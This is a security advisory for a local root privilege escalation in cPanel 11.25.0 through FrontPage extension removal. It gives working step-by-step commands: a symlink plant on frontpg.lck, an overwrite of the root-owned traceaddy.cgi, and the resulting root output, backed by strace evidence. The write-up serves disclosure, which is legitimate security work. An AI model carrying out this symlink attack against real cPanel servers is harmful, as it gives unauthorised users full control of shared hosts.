cPanel 11.25.0-E44589 - Local root privilege escalation when uninstalling FrontPage extension



DESCRIPTION


Resellers with permissions to add and remove FrontPage extensions could escalate their privileges to root when uninstalling FrontPage. We'll use the username user1 in the example below, and will take ownership of cPanel's traceaddy.cgi file, owned by root:root by default:

[user1@host]$ cd /home/user1/public_html/_vti_pvt
[user1@host]$ rm -f frontpg.lck
[user1@host]$ ln -s /usr/local/cpanel/whostmgr/docroot/cgi/traceaddy.cgi frontpg.lck

Now user1 owns the traceaddy.cgi file, which has been completely emptied. user1 can write to it, and execute it via WHM:

[user1@host ~/public_html/_vti_pvt]$ cat > /usr/local/cpanel/whostmgr/docroot/cgi/traceaddy.cgi << EOF
> #!/usr/bin/perl
> print "Content-type: text/plain\r\n\r\n";
> system("/usr/bin/id");
> EOF


https://x.x.x.x:2087/cgi/traceaddy.cgi
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


chown32() running as root against a user controlled file:

open:3171:11712    open("/home/user1/public_html/_vti_pvt/frontpg.lck", O_WRONLY|O_CREAT, 0666) = 4
stat64:3177:11712  stat64("/home/user1/public_html/_vti_pvt/frontpg.lck", {st_mode=S_IFREG|0666, st_size=0, ...}) = 0
chown32:3182:11712 chown32("/home/user1/public_html/_vti_pvt/frontpg.lck", 1259, 99) = 0
unlink:3767:11715  unlink("frontpg.lck")             = 0


rename() running as root against a user controlled file:

open:3241:11712    open("/home/user1/public_html/_vti_pvt/.services.org.tmp", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 6
lstat64:3244:11712 lstat64("/home/user1/public_html/_vti_pvt/.services.org.tmp", {st_mode=S_IFREG|0644, st_size=2, ...}) = 0
rename:3245:11712  rename("/home/user1/public_html/_vti_pvt/.services.org.tmp", "/home/user1/public_html/_vti_pvt/services.org") = 0



IMPACT


Resellers could get root access.